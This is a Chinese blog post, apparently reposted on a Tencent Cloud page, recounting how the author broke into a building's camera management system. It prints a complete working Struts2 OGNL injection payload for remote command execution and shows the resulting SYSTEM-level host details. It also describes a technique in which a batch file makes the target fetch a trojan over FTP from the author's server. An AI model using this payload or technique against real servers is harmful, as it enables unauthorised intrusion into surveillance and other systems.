渗透某摄像头系统

在工作中碰到了一个实战的渗透,同事们没有搞下,最后们我运气好弄下了。

实际上也是他们钻牛角尖了。

原因是这样,渗透某部门的摄像头管理系统。

不是类似什么busybox的嵌入式linux的命令执行。

这是个集成的摄像头web管理系统,可以监控整座大楼各个摄像头~

用的是某康~

Ok,D发给我了一个ip:12*.***.***.***

界面是这样的

url咋一看这不是撞了枪口么,struts2

12*.***.***.***/cms/login?service=http%3A%2F%2F12*.***.***.***%3A81%2Fvportal%2Fweb%2Fgateway%2Findex.action

Strust2漏洞在三八女神节那一天搅动了整个安全圈,让一些应急响应的哥们加班到半夜。虽然我不至于半夜,折腾了大半天也是到11点才走的。

以至于错过了给老妈,以及小时候疼我的一些女性长辈一些祝福….

加上CIA的黑客武器同一时间放出来,这种日子一年多来几次估计就GG了。

这里给出payload:

POST /cms/uploadlicenseFile.do HTTP/1.1

Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Host: 12*.***.***.***:8081

执行dir命令发现:UNC?说明这里存在映射,当前的路径不是web服务的路径。

用k8哥哥的工具直接获取了计算机的各项信息~~

nt authority\system

WebPath:D:\iVMS-7800\ivms_install\javaapps\ivms-lite\

OS.Type: Windows Server 2008 R2

OS.Arch: amd64

OS.Version: 6.1

UserName: WIN-68JQ6FB820C$

Domain: WORKGROUP

UserName: WIN-68JQ6FB820C$

Country: CN

上传了一个一句话木马、cmd马,各种马发现都不行。

被做了全局的限制,只要没有登录账户,都会被做了url的跳转

12*.***.***.***:8081/cms/one8.jsp

无论在哪个目录都做了url跳转,只要你想执行jsp。

无奈之下只能下载一套系统的走白盒测试。

网速太慢求助C牛,C牛有百度云会员,可以用在线解压哦,于是传了源码给我。

但是由于版本太老,没有什么收获。

他建议我在js目录下写入,但是没有写入权限。

一下是这个系统的结构,目录层次看图。

上图是我拿到整台服务器权限弄到的,至于我怎么拿到的呢。

各位看官听我细细道来。

首先呢,看这段payload,看不懂的同学也不要紧,jsp我也不大懂。

就是K8的作者他也不明白究竟是怎样的请求头上传的,POST、GET?

干脆他都写了,这也是我同事死磕的一点。

一直以为是get的字符限制导致了马儿上传失败。我用k8成功了他们去研究,但是研究出来了也是不能执行…

然后我发现用k8也是对木马有长度限制的,又不能执行。

百般无奈,试了N中办法,我突然开窍了。

测试FTP命令能不能使用,可以的话在远程的服务器上搭建一个FTP服务器,然后让目标机器下载。

凸凸凸,写了个批处理。

完了之后执行:D:\1.bat

Ok,将我的木马下载到这边。

服务器连接之。

这样我就成功了拿到目标的权限了。

原文发布于微信公众号 - 晨星先生(MoXuanIT)

原文发表时间:2017-03-11

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏极乐技术社区

我的第一个小程序(Discuz! + 微信小程序)

Github : https://github.com/DowneyL/di...‘

1.2K70
来自专栏北京马哥教育

动画演示9个超有趣的Linux命令

19150
来自专栏菩提树下的杨过

Flash/Flex学习笔记(7):FMS3.5基于IIS的安装

一般来讲,在windows上安装软件从来都不是什么难事儿,但FMS却在安装过程中"充满"了误导(好吧,其实也就是夸张的说法而已) 1.下载FMS3.5 http...

24260
来自专栏玉树芝兰

如何用Sikuli自动录入成绩?

手里明明有一份学生成绩Excel表格,却还得一一手动把它们输入到教务系统?类似这样的简单重复枯燥操作,其实你都可以一键让电脑自动替你完成。

22320
来自专栏about云

hadoop为什么64MB(或128MB或256MB)是最优选择?

问题导读: 为什么不能远少于64MB(或128MB或256MB) ? 为什么不能远大于64MB(或128MB或256MB)? 为什么不能远少于64...

31060
来自专栏岑志军的专栏

iOS逆向-ipa包重签名及非越狱手机安装多个微信

54440
来自专栏魏琼东

重写AgileEAS.NET SOA 中间件平台账号密码的加密算法

     AgileEAS.NET SOA 中间件平台是一款基于基于敏捷并行开发思想和Microsoft .Net构件(组件)开发技术而构建的一个快速开发应用平...

10100
来自专栏技术沉淀

很赞的开源小工具

14520
来自专栏程序员与猫

计算机组成原理之机器

1.1 计算机系统概论 1.1 计算机系统简介 把感应器嵌入和装备到电网,铁路,桥梁等各种物体中,并且被普遍连接,形成所谓“物联网”,然后将“物联网”与现代计算...

20290
来自专栏魏琼东

重写AgileEAS.NET SOA 中间件平台账号密码的加密算法

一、平台简介      AgileEAS.NET SOA 中间件平台是一款基于基于敏捷并行开发思想和Microsoft .Net构件(组件)开发技术而构建的一个...

21070

扫码关注云+社区

领取腾讯云代金券